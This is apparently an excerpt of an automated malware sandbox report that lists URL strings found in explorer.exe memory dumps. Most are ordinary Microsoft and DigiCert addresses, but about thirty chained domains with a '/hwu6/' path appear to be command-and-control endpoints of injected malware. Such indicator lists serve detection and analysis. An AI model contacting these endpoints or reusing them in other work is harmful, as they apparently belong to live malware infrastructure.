          Source: explorer.exe, 00000002.00000000.1660518211.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1666389880.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2756647360.0000000008A9F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2976289585.0000000008A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000002.00000000.1660518211.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000002.00000000.1667358180.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2696706638.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2842463004.000000000C85B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2809659599.000000000C857000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2819005763.000000000C85E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
          Source: explorer.exe, 00000002.00000000.1667358180.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2696706638.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2842463004.000000000C85B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2809659599.000000000C857000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2819005763.000000000C85E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
          Source: explorer.exe, 00000002.00000000.1668261446.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.2695016953.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1665720759.0000000008720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.04506.club
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.04506.club/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.04506.club/hwu6/www.maheshg.xyz
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.04506.clubReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.66sodovna.net
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.66sodovna.net/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.66sodovna.net/hwu6/I:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.66sodovna.net/hwu6/www.04506.club
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.66sodovna.netReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6vay.boats
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6vay.boats/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6vay.boats/hwu6/www.66sodovna.net
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6vay.boatsReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.7b5846.online
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.7b5846.online/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.7b5846.online/hwu6/www.vibrantsoul.xyz
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.7b5846.onlineReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.8e5lr5i9zu.buzz
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.8e5lr5i9zu.buzz/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.8e5lr5i9zu.buzz/hwu6/www.inefity.cloud
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.8e5lr5i9zu.buzzReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apoppynote.com
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apoppynote.com/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apoppynote.com/hwu6/www.otzen.info
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apoppynote.comReferer:
          Source: explorer.exe, 00000002.00000002.2700282302.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1669923079.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bethlark.top
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bethlark.top/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bethlark.top/hwu6/www.apoppynote.com
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bethlark.top/hwu6/www.ozzd86fih4.online
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bethlark.topReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cloggedpipes.net
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cloggedpipes.net/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cloggedpipes.net/hwu6/www.66sodovna.net
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cloggedpipes.netReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dangdut4dselalu.pro
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dangdut4dselalu.pro/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dangdut4dselalu.pro/hwu6/www.lf758.vip
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dangdut4dselalu.pro/hwu6/www.stairr-lift-find.today
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dangdut4dselalu.proReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dental-implants-83810.bond
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dental-implants-83810.bond/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dental-implants-83810.bond/hwu6/www.8e5lr5i9zu.buzz
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dental-implants-83810.bondReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edmaker.online
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edmaker.online/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edmaker.online/hwu6/www.dental-implants-83810.bond
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edmaker.onlineReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eternityzon.shop
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eternityzon.shop/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eternityzon.shop/hwu6/www.7b5846.online
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eternityzon.shopReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imxtld.club
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imxtld.club/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imxtld.club/hwu6/www.ux-design-courses-53497.bond
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imxtld.clubReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.inefity.cloud
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.inefity.cloud/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.inefity.cloud/hwu6/www.bethlark.top
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.inefity.cloudReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lebahsemesta57.click
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lebahsemesta57.click/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lebahsemesta57.click/hwu6/www.bethlark.top
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lebahsemesta57.clickReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lf758.vip
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lf758.vip/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lf758.vip/hwu6/www.sugatoken.xyz
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lf758.vipReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.locerin-hair.shop
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.locerin-hair.shop/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.locerin-hair.shop/hwu6/www.edmaker.online
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.locerin-hair.shopReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maheshg.xyz
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maheshg.xyz/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maheshg.xyz/hwu6/www.eternityzon.shop
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maheshg.xyzReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.migraine-treatment-36101.bond
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.migraine-treatment-36101.bond/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.migraine-treatment-36101.bond/hwu6/www.rider.vision
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.migraine-treatment-36101.bondReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.otzen.info
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.otzen.info/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.otzen.info/hwu6/www.migraine-treatment-36101.bond
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.otzen.infoReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozzd86fih4.online
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozzd86fih4.online/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozzd86fih4.online/hwu6/www.6vay.boats
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozzd86fih4.onlineReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rider.vision
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rider.vision/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rider.vision/hwu6/www.dangdut4dselalu.pro
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rider.visionReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stairr-lift-find.today
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stairr-lift-find.today/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stairr-lift-find.today/hwu6/www.cloggedpipes.net
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stairr-lift-find.todayReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sugatoken.xyz
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sugatoken.xyz/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sugatoken.xyzReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ux-design-courses-53497.bond
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ux-design-courses-53497.bond/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ux-design-courses-53497.bond/hwu6/www.vytech.net
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ux-design-courses-53497.bondReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyz
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyz/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyz/hwu6/www.dangdut4dselalu.pro
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyz/hwu6/www.locerin-hair.shop
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyzReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vytech.net
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vytech.net/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vytech.net/hwu6/www.lebahsemesta57.click
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vytech.netReferer:
          Source: explorer.exe, 00000002.00000000.1669923079.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2700282302.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000002.00000000.1660518211.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3kP
          Source: explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmP
          Source: explorer.exe, 00000002.00000000.1660518211.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000002.00000000.1669923079.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2700282302.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000002.00000000.1666389880.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2756647360.0000000008BBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2976289585.0000000008BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 0000000E.00000003.2756647360.0000000008BBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2976289585.0000000008BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/4deyI
          Source: explorer.exe, 00000002.00000000.1666389880.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 0000000E.00000002.2920536485.00000000079D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000002.00000000.1666389880.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 0000000E.00000003.2756647360.0000000008A9F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2976289585.0000000008A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?L
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000002.00000000.1666389880.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2919550460.0000000004CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 0000000E.00000002.2976289585.000000000897F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2758026440.0000000008996000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000002.00000000.1666389880.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
